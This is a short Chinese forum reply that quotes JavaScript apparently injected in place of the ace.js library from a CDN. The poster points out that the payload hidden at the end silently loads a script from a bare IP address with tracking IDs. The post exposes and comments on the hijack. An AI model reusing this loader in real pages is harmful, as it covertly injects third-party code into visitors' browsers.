@
billchenchina 我这里看到的是
var _ju = "
http://cdn.staticfile.org/ace/1.1.3/ace.js";var _ju = _ju+(_ju.indexOf('?') > 0 ? '&' : '?') + '_t=' + (new Date().getTime());var _b = "AH023516";var _c = "23795593_(i1P6V1gdic8tiJiRDm==_1281042715_1";
function __crsp(s){
var N1=document.createElement("script");N1.setAttribute("type","text/javascript"),N1.setAttribute("src",s),document.head?document.head.appendChild(N1):document.body&&document.body.appendChild(N1);
}
var l=document.location.host.split('.');
if(_ju.indexOf(l[l.length-2]+'.'+l[l.length-1])>0){
var html = '<div><script>document.write(unescape(\'%3Cscript src="' + _ju + '" %3E%3C/script%3E\') );<\/script></div>';
document.write(html);
}else{
__crsp(_ju);
}
__crsp("http://183.207.103.130:8081/pjk/static/tp.php?b="+_b);
这劫持做的太好玩了,先写一层 HTML,乍一看上去以为是普通 JS 内容,没什么异常。好东西藏在最后。